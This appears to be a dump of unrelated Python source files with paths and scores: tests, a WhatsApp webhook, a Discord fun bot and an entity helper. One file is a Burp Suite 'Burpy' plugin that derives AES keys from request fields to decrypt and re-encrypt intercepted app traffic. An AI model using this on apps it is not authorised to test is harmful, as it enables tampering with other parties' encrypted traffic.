url = self.urlbase + 'specific_500_exception'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "I threw a 500", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testNotSerialisableException(self):
"""
Method will raise an EncodeError and return 500
"""
url = self.urlbase + 'not_serialisable'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "Server Error", 'got: %s' % json.loads(response)['message']
assert json.loads(response)['type'] == "TypeError", 'got: %s' % json.loads(response)['type']
if __name__ == "__main__":
unittest.main() | 0.600774 | 0.23375 |
from nose.tools import eq_
from ..apply import apply
from ..tokenizers import text_split
def diff_and_replay(diff):
a = """
This sentence is going to get copied. This sentence is going to go away.
This is a paragraph that is mostly going to change. However, there's going
to be a sentence right in the middle that stays. And now we're done with
that.
This is another sentence. asldknasl dsal dals dals dlasd oa kdlawbndkubawdk
"""
b = """
This sentence is going to get copied. Wha... a new thing appeared!
Everyone thought that this paragraph would totally change. However, there's
going to be a sentence right in the middle that stays. Isn't that funny!?
This is another sentence. This sentence is going to get copied.
"""
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("Diff 1:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b))
a = "I'm new here. This sentence is a sentence. I'm new here."
b = "I'm new here. Sentence is a sentence."
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("\nDiff 2:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b))
a = """This is a test paragraph. It has some sentences.
I have a lovely bunch of coconuts.
This is another test paragraph. It also has some sentences.
This is a test sentence just floating in space."""
b = """This is a test paragraph. It has some sentences.
This is another test paragraph. It also has some sentences.
I have a lovely bunch of coconuts.
This is a test sentence just floating in space."""
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("\nDiff 3:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b)) | deltas/tests/diff_and_replay.py | from nose.tools import eq_
from ..apply import apply
from ..tokenizers import text_split
def diff_and_replay(diff):
a = """
This sentence is going to get copied. This sentence is going to go away.
This is a paragraph that is mostly going to change. However, there's going
to be a sentence right in the middle that stays. And now we're done with
that.
This is another sentence. asldknasl dsal dals dals dlasd oa kdlawbndkubawdk
"""
b = """
This sentence is going to get copied. Wha... a new thing appeared!
Everyone thought that this paragraph would totally change. However, there's
going to be a sentence right in the middle that stays. Isn't that funny!?
This is another sentence. This sentence is going to get copied.
"""
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("Diff 1:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b))
a = "I'm new here. This sentence is a sentence. I'm new here."
b = "I'm new here. Sentence is a sentence."
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("\nDiff 2:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b))
a = """This is a test paragraph. It has some sentences.
I have a lovely bunch of coconuts.
This is another test paragraph. It also has some sentences.
This is a test sentence just floating in space."""
b = """This is a test paragraph. It has some sentences.
This is another test paragraph. It also has some sentences.
I have a lovely bunch of coconuts.
This is a test sentence just floating in space."""
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("\nDiff 3:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b)) | 0.467818 | 0.539832 |
import re
import base64
import hashlib
from urllib import unquote,urlencode
from Crypto.Cipher import AES
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
class Burpy:
'''
header is list, append as your need
body is string, modify as your need
'''
def __init__(self):
self.key = ""
self.iv = ""
self.apicode = ""
self.head = ""
def main(self, header, body):
print "head:", header
print "body:", body
return header, body
def encrypt(self, header, body):
if(self.apicode != ''):
print "Encryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
data = self.pkcs7padding(data)
encrypted = cipher.encrypt(data)
encrypted = base64.b64encode(encrypted)
body_param = urlencode({"body":encrypted})
ret_body = "head=" + self.head + "&" + body_param
body = ret_body
return header, body
def decrypt(self, header, body):
if(self.apicode != ''):
print "Decryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
data = base64.b64decode(data, '-_')
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
decrypted = self.pkcs7unpadding(decrypted)
ret_body = "head=" + self.head + "&body=" + decrypted
body = ret_body
else:
data = base64.b64decode(body)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
body = self.pkcs7unpadding(decrypted)
return header, body
def sign(self, header, body):
return header, body
def processor(self, payload):
return payload+"burpyed"
def pkcs7padding(self, data):
bs = AES.block_size
padding = bs - len(data) % bs
padding_text = chr(padding) * padding
return data + padding_text
def pkcs7unpadding(self, data):
lengt = len(data)
unpadding = ord(data[lengt - 1])
return data[0:lengt - unpadding] | examples/aes_endec[outdated].py | import re
import base64
import hashlib
from urllib import unquote,urlencode
from Crypto.Cipher import AES
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
class Burpy:
'''
header is list, append as your need
body is string, modify as your need
'''
def __init__(self):
self.key = ""
self.iv = ""
self.apicode = ""
self.head = ""
def main(self, header, body):
print "head:", header
print "body:", body
return header, body
def encrypt(self, header, body):
if(self.apicode != ''):
print "Encryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
data = self.pkcs7padding(data)
encrypted = cipher.encrypt(data)
encrypted = base64.b64encode(encrypted)
body_param = urlencode({"body":encrypted})
ret_body = "head=" + self.head + "&" + body_param
body = ret_body
return header, body
def decrypt(self, header, body):
if(self.apicode != ''):
print "Decryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
data = base64.b64decode(data, '-_')
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
decrypted = self.pkcs7unpadding(decrypted)
ret_body = "head=" + self.head + "&body=" + decrypted
body = ret_body
else:
data = base64.b64decode(body)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
body = self.pkcs7unpadding(decrypted)
return header, body
def sign(self, header, body):
return header, body
def processor(self, payload):
return payload+"burpyed"
def pkcs7padding(self, data):
bs = AES.block_size
padding = bs - len(data) % bs
padding_text = chr(padding) * padding
return data + padding_text
def pkcs7unpadding(self, data):
lengt = len(data)
unpadding = ord(data[lengt - 1])
return data[0:lengt - unpadding] | 0.246715 | 0.111676 |
from asyncio import gather
from datetime import datetime, timezone
from sanic import Blueprint
from sanic.request import Request
from sanic.response import HTTPResponse, json
from vxwhatsapp import config
from vxwhatsapp.auth import validate_hmac
from vxwhatsapp.claims import store_conversation_claim
from vxwhatsapp.models import Event, Message
from vxwhatsapp.schema import validate_schema, whatsapp_webhook_schema
bp = Blueprint("whatsapp", version=1)
async def publish_message(request, message):
return await gather(
request.app.publisher.publish_message(message),
store_conversation_claim(
request.app.redis,
request.headers.get("X-Turn-Claim"),
message.from_addr,
),
)
async def dedupe_and_publish_message(request, message):
if not request.app.redis:
return await publish_message(request, message)
lock_key = f"msglock:{message.message_id}"
seen_key = f"msgseen:{message.message_id}"
lock = request.app.redis.lock(lock_key, timeout=1.0, blocking_timeout=2.0)
async with lock:
if await request.app.redis.get(seen_key) is not None:
return
await publish_message(request, message)
await request.app.redis.setex(seen_key, config.DEDUPLICATION_WINDOW, "")
@bp.route("/webhook", methods=["POST"])
@validate_hmac("X-Turn-Hook-Signature", lambda: config.HMAC_SECRET)
@validate_schema(whatsapp_webhook_schema)
async def whatsapp_webhook(request: Request) -> HTTPResponse:
tasks = []
for msg in request.json.get("messages", []):
if msg["type"] == "system":
# Ignore system messages
continue
timestamp = datetime.fromtimestamp(float(msg.pop("timestamp")), tz=timezone.utc)
content = None
if msg["type"] == "text":
content = msg.pop("text")["body"]
elif msg["type"] == "location":
content = msg["location"].pop("name", None)
elif msg["type"] == "button":
content = msg["button"].pop("text")
elif msg["type"] == "interactive":
if msg["interactive"]["type"] == "list_reply":
content = msg["interactive"]["list_reply"].pop("title")
else:
content = msg["interactive"]["button_reply"].pop("title")
elif msg["type"] in ("unknown", "contacts"):
content = None
else:
content = msg[msg["type"]].pop("caption", None)
message = Message(
to_addr=config.WHATSAPP_NUMBER,
from_addr=msg.pop("from"),
content=content,
in_reply_to=msg.get("context", {}).pop("id", None),
transport_name=config.TRANSPORT_NAME,
transport_type=Message.TRANSPORT_TYPE.HTTP_API,
timestamp=timestamp,
message_id=msg.pop("id"),
to_addr_type=Message.ADDRESS_TYPE.MSISDN,
from_addr_type=Message.ADDRESS_TYPE.MSISDN,
transport_metadata={
"contacts": request.json.get("contacts"),
"message": msg,
"claim": request.headers.get("X-Turn-Claim"),
},
)
tasks.append(dedupe_and_publish_message(request, message))
for ev in request.json.get("statuses", []):
message_id = ev.pop("id")
status = ev["status"]
event_type, delivery_status = {
"read": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"delivered": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"ack": (Event.EVENT_TYPE.ACK, None),
"failed": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.FAILED,
),
"deleted": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
}[status]
timestamp = datetime.fromtimestamp(float(ev.pop("timestamp")), tz=timezone.utc)
event = Event(
user_message_id=message_id,
event_type=event_type,
timestamp=timestamp,
sent_message_id=message_id,
delivery_status=delivery_status,
helper_metadata=ev,
)
tasks.append(request.app.publisher.publish_event(event))
await gather(*tasks)
return json({}) | vxwhatsapp/whatsapp.py | from asyncio import gather
from datetime import datetime, timezone
from sanic import Blueprint
from sanic.request import Request
from sanic.response import HTTPResponse, json
from vxwhatsapp import config
from vxwhatsapp.auth import validate_hmac
from vxwhatsapp.claims import store_conversation_claim
from vxwhatsapp.models import Event, Message
from vxwhatsapp.schema import validate_schema, whatsapp_webhook_schema
bp = Blueprint("whatsapp", version=1)
async def publish_message(request, message):
return await gather(
request.app.publisher.publish_message(message),
store_conversation_claim(
request.app.redis,
request.headers.get("X-Turn-Claim"),
message.from_addr,
),
)
async def dedupe_and_publish_message(request, message):
if not request.app.redis:
return await publish_message(request, message)
lock_key = f"msglock:{message.message_id}"
seen_key = f"msgseen:{message.message_id}"
lock = request.app.redis.lock(lock_key, timeout=1.0, blocking_timeout=2.0)
async with lock:
if await request.app.redis.get(seen_key) is not None:
return
await publish_message(request, message)
await request.app.redis.setex(seen_key, config.DEDUPLICATION_WINDOW, "")
@bp.route("/webhook", methods=["POST"])
@validate_hmac("X-Turn-Hook-Signature", lambda: config.HMAC_SECRET)
@validate_schema(whatsapp_webhook_schema)
async def whatsapp_webhook(request: Request) -> HTTPResponse:
tasks = []
for msg in request.json.get("messages", []):
if msg["type"] == "system":
# Ignore system messages
continue
timestamp = datetime.fromtimestamp(float(msg.pop("timestamp")), tz=timezone.utc)
content = None
if msg["type"] == "text":
content = msg.pop("text")["body"]
elif msg["type"] == "location":
content = msg["location"].pop("name", None)
elif msg["type"] == "button":
content = msg["button"].pop("text")
elif msg["type"] == "interactive":
if msg["interactive"]["type"] == "list_reply":
content = msg["interactive"]["list_reply"].pop("title")
else:
content = msg["interactive"]["button_reply"].pop("title")
elif msg["type"] in ("unknown", "contacts"):
content = None
else:
content = msg[msg["type"]].pop("caption", None)
message = Message(
to_addr=config.WHATSAPP_NUMBER,
from_addr=msg.pop("from"),
content=content,
in_reply_to=msg.get("context", {}).pop("id", None),
transport_name=config.TRANSPORT_NAME,
transport_type=Message.TRANSPORT_TYPE.HTTP_API,
timestamp=timestamp,
message_id=msg.pop("id"),
to_addr_type=Message.ADDRESS_TYPE.MSISDN,
from_addr_type=Message.ADDRESS_TYPE.MSISDN,
transport_metadata={
"contacts": request.json.get("contacts"),
"message": msg,
"claim": request.headers.get("X-Turn-Claim"),
},
)
tasks.append(dedupe_and_publish_message(request, message))
for ev in request.json.get("statuses", []):
message_id = ev.pop("id")
status = ev["status"]
event_type, delivery_status = {
"read": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"delivered": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"ack": (Event.EVENT_TYPE.ACK, None),
"failed": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.FAILED,
),
"deleted": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
}[status]
timestamp = datetime.fromtimestamp(float(ev.pop("timestamp")), tz=timezone.utc)
event = Event(
user_message_id=message_id,
event_type=event_type,
timestamp=timestamp,
sent_message_id=message_id,
delivery_status=delivery_status,
helper_metadata=ev,
)
tasks.append(request.app.publisher.publish_event(event))
await gather(*tasks)
return json({}) | 0.297878 | 0.061312 |
import asyncio
import datetime
import random
import urllib.parse
import discord
import requests
from discord.ext import commands
from romme import RepublicanDate
from modules.utils import lists
class Fun(commands.Cog):
conf = {}
def __init__(self, bot):
self.bot = bot
self.config = bot.config
@commands.command(aliases=['8ball'])
@commands.guild_only()
async def eightball(self, ctx, *, question: str = None):
"""
Ask to the 8Ball something
"""
if question is None:
await ctx.send('Oh shit! The crystal ball fell off.... Come back later')
else:
answer = random.choice(lists.ballresponse)
await ctx.send(f"Question: {question}\nAnswer: {answer}")
@commands.command(aliases=['chat'])
@commands.guild_only()
async def cat(self, ctx):
"""
Nekos are life
"""
r = requests.get('https://nekos.life/api/v2/img/meow')
r = r.json()
await ctx.send(r["url"])
@commands.command()
async def dog(self, ctx):
"""
Doggy !!!
"""
r = requests.get('https://random.dog/woof.json')
r = r.json()
await ctx.send(r["url"])
@commands.command()
@commands.guild_only()
async def lovepower(self, ctx, user: discord.Member = None):
"""
What's his love power
"""
if user is None:
user = ctx.message.author
seed = user.discriminator
random.seed(seed)
love = random.randint(1, 100)
if love < 20:
emoji = "💔"
elif love > 20:
emoji = "❤"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
elif love == 69:
emoji = "🔞"
await ctx.send("Love power of {} is {}! {}".format(user.name, love, emoji))
@commands.command()
@commands.guild_only()
async def rd(self, ctx):
"""
Display the Republican Date
"""
today = datetime.date.today()
rd = RepublicanDate.from_gregorian(today.year, today.month, today.day)
try:
await ctx.send(rd)
except discord.HTTPException:
pass
@commands.command()
@commands.guild_only()
async def choose(self, ctx, *, answers: str):
"""
Random choice
"""
toto = random.choice(answers.split())
await ctx.send(toto)
@commands.command()
@commands.guild_only()
async def linux(self, ctx):
"""
Linux joke
"""
answer = random.choice(lists.linux)
embed = discord.Embed(colour=discord.Colour.green())
embed.description = answer
await ctx.send(embed=embed)
@commands.command()
@commands.guild_only()
async def number(self, ctx, number: int = None):
"""
Teach you sth about a number
"""
if not number:
number = random.randrange(1, 1789)
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{number}')
response_year = requests.get(f'http://numbersapi.com/{number}/year')
await ctx.send("**Number fact** :\n" + str(response.text) + "\n**Year fact** :\n" + str(response_year.text))
@commands.command()
async def trump(self, ctx, tag: str = None):
"""
Trump is a meme
"""
async with ctx.channel.typing():
if not tag:
response = requests.get("https://api.tronalddump.io/random/quote")
else:
response = requests.get(
f"https://api.tronalddump.io/tag/{urllib.parse.quote_plus(tag.lower().strip())}")
r = response.json()
await ctx.send(f"Geek Joke :\n**{r['value']}**")
@commands.command(aliases=["chuck", "norris", "cn"])
@commands.guild_only()
async def chucknorris(self, ctx):
"""
Chuck Norris is GOD
"""
async with ctx.channel.typing():
r = requests.get("https://api.chucknorris.io/jokes/random")
r = r.json()
await ctx.send(r["value"])
@commands.command(aliases=["dev_joke", "programmer_joke", "geekjoke"])
@commands.guild_only()
async def geek_joke(self, ctx):
"""
If you're not a geek, go on your way
"""
r = requests.get('https://geek-jokes.sameerkumar.website/api')
await ctx.send(f"Geek Joke :\n**{r.text}**")
@commands.command()
@commands.guild_only()
async def cookie(self, ctx, user: discord.Member):
"""
Cookie Eater
"""
await ctx.send(
f"**{user.display_name}**, you've been given a cookie by **{ctx.author.display_name}**. :cookie:")
@commands.command()
@commands.guild_only()
async def today(self, ctx):
"""
Teach you sth about today
"""
today = datetime.datetime.now()
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{today.month}/{today.day}/date')
await ctx.send(response.text)
@commands.command(aliases=["ice-cream"])
@commands.guild_only()
async def ice(self, ctx, user: discord.Member):
"""
Give an ice
"""
await ctx.send(f"{user.mention}, here is your ice: :ice_cream:!")
@commands.command(aliases=["l2g"])
@commands.guild_only()
async def lmgtfy(self, ctx, *, msg: str = None):
"""
Let me google this for you
"""
if not msg:
url = "https://lmgtfy.com/?q=The+answer+to+life&p=1"
else:
url = f"http://lmgtfy.com/?q={urllib.parse.quote_plus(msg.lower().strip())}"
await ctx.send(url)
@commands.command(aliases=["love"])
@commands.guild_only()
async def love_calc(self, ctx, user: discord.Member, user_: discord.Member = None):
"""
Can they date ?
"""
if not user_:
user_ = ctx.message.author
random.seed(int(str(user.id) + str(user_.id)))
if user == user_:
if user.id == 282233191916634113:
love = 0.0
else:
love = 100.00
else:
love = random.randint(1, 10000) / 100
if love < 50:
emoji = "💔"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
await ctx.send(f"{user.name} + {user_.name} = {emoji} | {love}% of love")
@commands.command()
@commands.guild_only()
async def urban(self, ctx, *, search: str):
"""
Urban dic is you new best friend
"""
async with ctx.channel.typing():
url = requests.get(f'https://api.urbandictionary.com/v0/define?term={search}')
url = url.json()
if url is None:
return await ctx.send("The API is broken...")
if not len(url['list']):
return await ctx.send("Couldn't find it...")
result = sorted(url['list'], reverse=True, key=lambda g: int(g["thumbs_up"]))[0]
definition = result['definition']
if len(definition) >= 500:
definition = definition[:500]
definition = definition.rsplit(' ', 1)[0]
definition += '...'
await ctx.send(f"📚 Definitions for **{result['word']}**```fix\n{definition}```")
@commands.command()
@commands.guild_only()
async def rps(self, ctx):
embed1 = discord.Embed(
title=f"Rock, Paper, Scissors",
description="Please type the choice u want to use! \n \n[1] Rock \n \n[2] Paper \n \n[3] Scissors",
colour=discord.Colour.dark_blue()
)
game = ["rock", "paper", "scissors"]
results = ["You Won!", "You Lost!", "A Tie!"]
bot = random.choice(game)
await ctx.send(embed=embed1)
try:
msg = await self.bot.wait_for('message', timeout=120, check=lambda msg: msg.author == ctx.author)
except asyncio.TimeoutError:
await ctx.send('👎', delete_after=3)
message = str(msg.content.lower())
if message not in game and message not in ["1", "2", "3"]:
await ctx.send("Please type a valid value! Was the spelling correct?")
return
if message == bot:
result = results[2]
colour = discord.Colour.blue()
elif (message in ["paper", "2"] and bot == "rock") or (
message in ["rock", "1"] and bot == "scissors") or (
message in ["scissors", "3"] and bot == "paper"):
result = results[0]
colour = discord.Colour.green()
else:
result = results[1]
colour = discord.Colour.dark_red()
embed2 = discord.Embed(
title=f"{ctx.message.author.display_name}'s Rock, Paper, Scissors Game!",
description=f"Bot choice: `{bot.capitalize()}` \n \nYour choice:`{msg.content.capitalize()}` \n \nResult:`{result}`",
colour=colour
)
await ctx.send(embed=embed2)
def setup(bot):
bot.add_cog(Fun(bot)) | modules/fun/fun.py |
import asyncio
import datetime
import random
import urllib.parse
import discord
import requests
from discord.ext import commands
from romme import RepublicanDate
from modules.utils import lists
class Fun(commands.Cog):
conf = {}
def __init__(self, bot):
self.bot = bot
self.config = bot.config
@commands.command(aliases=['8ball'])
@commands.guild_only()
async def eightball(self, ctx, *, question: str = None):
"""
Ask to the 8Ball something
"""
if question is None:
await ctx.send('Oh shit! The crystal ball fell off.... Come back later')
else:
answer = random.choice(lists.ballresponse)
await ctx.send(f"Question: {question}\nAnswer: {answer}")
@commands.command(aliases=['chat'])
@commands.guild_only()
async def cat(self, ctx):
"""
Nekos are life
"""
r = requests.get('https://nekos.life/api/v2/img/meow')
r = r.json()
await ctx.send(r["url"])
@commands.command()
async def dog(self, ctx):
"""
Doggy !!!
"""
r = requests.get('https://random.dog/woof.json')
r = r.json()
await ctx.send(r["url"])
@commands.command()
@commands.guild_only()
async def lovepower(self, ctx, user: discord.Member = None):
"""
What's his love power
"""
if user is None:
user = ctx.message.author
seed = user.discriminator
random.seed(seed)
love = random.randint(1, 100)
if love < 20:
emoji = "💔"
elif love > 20:
emoji = "❤"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
elif love == 69:
emoji = "🔞"
await ctx.send("Love power of {} is {}! {}".format(user.name, love, emoji))
@commands.command()
@commands.guild_only()
async def rd(self, ctx):
"""
Display the Republican Date
"""
today = datetime.date.today()
rd = RepublicanDate.from_gregorian(today.year, today.month, today.day)
try:
await ctx.send(rd)
except discord.HTTPException:
pass
@commands.command()
@commands.guild_only()
async def choose(self, ctx, *, answers: str):
"""
Random choice
"""
toto = random.choice(answers.split())
await ctx.send(toto)
@commands.command()
@commands.guild_only()
async def linux(self, ctx):
"""
Linux joke
"""
answer = random.choice(lists.linux)
embed = discord.Embed(colour=discord.Colour.green())
embed.description = answer
await ctx.send(embed=embed)
@commands.command()
@commands.guild_only()
async def number(self, ctx, number: int = None):
"""
Teach you sth about a number
"""
if not number:
number = random.randrange(1, 1789)
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{number}')
response_year = requests.get(f'http://numbersapi.com/{number}/year')
await ctx.send("**Number fact** :\n" + str(response.text) + "\n**Year fact** :\n" + str(response_year.text))
@commands.command()
async def trump(self, ctx, tag: str = None):
"""
Trump is a meme
"""
async with ctx.channel.typing():
if not tag:
response = requests.get("https://api.tronalddump.io/random/quote")
else:
response = requests.get(
f"https://api.tronalddump.io/tag/{urllib.parse.quote_plus(tag.lower().strip())}")
r = response.json()
await ctx.send(f"Geek Joke :\n**{r['value']}**")
@commands.command(aliases=["chuck", "norris", "cn"])
@commands.guild_only()
async def chucknorris(self, ctx):
"""
Chuck Norris is GOD
"""
async with ctx.channel.typing():
r = requests.get("https://api.chucknorris.io/jokes/random")
r = r.json()
await ctx.send(r["value"])
@commands.command(aliases=["dev_joke", "programmer_joke", "geekjoke"])
@commands.guild_only()
async def geek_joke(self, ctx):
"""
If you're not a geek, go on your way
"""
r = requests.get('https://geek-jokes.sameerkumar.website/api')
await ctx.send(f"Geek Joke :\n**{r.text}**")
@commands.command()
@commands.guild_only()
async def cookie(self, ctx, user: discord.Member):
"""
Cookie Eater
"""
await ctx.send(
f"**{user.display_name}**, you've been given a cookie by **{ctx.author.display_name}**. :cookie:")
@commands.command()
@commands.guild_only()
async def today(self, ctx):
"""
Teach you sth about today
"""
today = datetime.datetime.now()
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{today.month}/{today.day}/date')
await ctx.send(response.text)
@commands.command(aliases=["ice-cream"])
@commands.guild_only()
async def ice(self, ctx, user: discord.Member):
"""
Give an ice
"""
await ctx.send(f"{user.mention}, here is your ice: :ice_cream:!")
@commands.command(aliases=["l2g"])
@commands.guild_only()
async def lmgtfy(self, ctx, *, msg: str = None):
"""
Let me google this for you
"""
if not msg:
url = "https://lmgtfy.com/?q=The+answer+to+life&p=1"
else:
url = f"http://lmgtfy.com/?q={urllib.parse.quote_plus(msg.lower().strip())}"
await ctx.send(url)
@commands.command(aliases=["love"])
@commands.guild_only()
async def love_calc(self, ctx, user: discord.Member, user_: discord.Member = None):
"""
Can they date ?
"""
if not user_:
user_ = ctx.message.author
random.seed(int(str(user.id) + str(user_.id)))
if user == user_:
if user.id == 282233191916634113:
love = 0.0
else:
love = 100.00
else:
love = random.randint(1, 10000) / 100
if love < 50:
emoji = "💔"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
await ctx.send(f"{user.name} + {user_.name} = {emoji} | {love}% of love")
@commands.command()
@commands.guild_only()
async def urban(self, ctx, *, search: str):
"""
Urban dic is you new best friend
"""
async with ctx.channel.typing():
url = requests.get(f'https://api.urbandictionary.com/v0/define?term={search}')
url = url.json()
if url is None:
return await ctx.send("The API is broken...")
if not len(url['list']):
return await ctx.send("Couldn't find it...")
result = sorted(url['list'], reverse=True, key=lambda g: int(g["thumbs_up"]))[0]
definition = result['definition']
if len(definition) >= 500:
definition = definition[:500]
definition = definition.rsplit(' ', 1)[0]
definition += '...'
await ctx.send(f"📚 Definitions for **{result['word']}**```fix\n{definition}```")
@commands.command()
@commands.guild_only()
async def rps(self, ctx):
embed1 = discord.Embed(
title=f"Rock, Paper, Scissors",
description="Please type the choice u want to use! \n \n[1] Rock \n \n[2] Paper \n \n[3] Scissors",
colour=discord.Colour.dark_blue()
)
game = ["rock", "paper", "scissors"]
results = ["You Won!", "You Lost!", "A Tie!"]
bot = random.choice(game)
await ctx.send(embed=embed1)
try:
msg = await self.bot.wait_for('message', timeout=120, check=lambda msg: msg.author == ctx.author)
except asyncio.TimeoutError:
await ctx.send('👎', delete_after=3)
message = str(msg.content.lower())
if message not in game and message not in ["1", "2", "3"]:
await ctx.send("Please type a valid value! Was the spelling correct?")
return
if message == bot:
result = results[2]
colour = discord.Colour.blue()
elif (message in ["paper", "2"] and bot == "rock") or (
message in ["rock", "1"] and bot == "scissors") or (
message in ["scissors", "3"] and bot == "paper"):
result = results[0]
colour = discord.Colour.green()
else:
result = results[1]
colour = discord.Colour.dark_red()
embed2 = discord.Embed(
title=f"{ctx.message.author.display_name}'s Rock, Paper, Scissors Game!",
description=f"Bot choice: `{bot.capitalize()}` \n \nYour choice:`{msg.content.capitalize()}` \n \nResult:`{result}`",
colour=colour
)
await ctx.send(embed=embed2)
def setup(bot):
bot.add_cog(Fun(bot)) | 0.321141 | 0.100746 |
from abc import ABC
from typing import Any, Dict, List, Optional, Tuple, Type, Union, cast
from dokklib_db_extended.index import GlobalIndex
from dokklib_db_extended.serializer import Serializer
AnySortKey = Union['SortKey', 'PrefixSortKey']
class EntityName(ABC):
"""Abstract base class of entity names.
Applications must define their entities by inheriting from this class.
Eg. in "app/entities.py":
```python
import dokklib_db_extended as db
class User(db.EntityName):
pass
class Product(db.EntityName):
pass
...
```
"""
def __new__(cls) -> 'EntityName': # pragma: no cover
"""Prevent creating abstract base class."""
raise TypeError(f'{cls.__name__} can not be instantiated.')
@classmethod
def to_prefix(cls) -> str:
"""Convert class name to key prefix.
Returns:
The key prefix. Eg. if class name is 'User', then the prefix is
'USER#'.
"""
if cls is EntityName:
